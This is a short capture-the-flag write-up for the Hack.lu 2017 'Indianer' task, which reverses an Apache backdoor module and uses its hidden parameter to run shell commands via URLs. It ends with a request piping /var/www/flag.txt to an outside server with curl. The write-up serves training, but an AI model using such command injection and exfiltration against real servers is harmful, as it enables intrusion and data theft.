<-- home

Hack.lu CTF 2017 / Indianer

October 19, 2017

Hello guys ,

So i will explain my team solution for this task

It was really amazing task because its reverse + web so it need lot of knowledge to solve it

So first we check the task !

capture d ecran 2017-10-19 a 11 23 25 am

Next we have backdoor.so library used with the apache server

If we need to solve this should first understand the backdoor.so how it works

So it check first for GET\x00ndex.html

capture d ecran 2017-10-19 a 11 30 37 am

capture d ecran 2017-10-19 a 11 31 12 am

OK so we need to send https://indianer.flatearth.fluxfingers.net//x00ndex.html as first to make it all work

then there is system function that get argument from url , but its not clear what name is this arg

so we make our prog to get the arg name

capture d ecran 2017-10-19 a 11 33 34 am

and it was “dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp” So this is the second part

https://indianer.flatearth.fluxfingers.net/x00ndex.html?dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=

what Next?

first what we tried to do it to understand where the flag will be shown

We tried first simple check like https://indianer.flatearth.fluxfingers.net/x00ndex.html_dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=ls

but for sure no output there :(

After some check we get that the ‘_’ is replaced with ‘ ‘

So no need space here

capture d ecran 2017-10-19 a 11 37 02 am

Also flag will not shown here in the web part

So if we make the flag redirected somewhere it maybe will work

So curl is the best solution , but we figure this out when the ctf already end :( and we didnt get any points for this task

Anyway it was Cool task to improve our skills

Ok lets continue !

So we need curl? ok so we will send the flag to our server using curl

So our last solution was to make this request and its work :D

https://indianer.flatearth.fluxfingers.net/x00ndex.html?dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=curl_serverip/cat_/var/www/flag.txt

capture d ecran 2017-10-19 a 11 15 22 am

No points but we did it :D

Thanks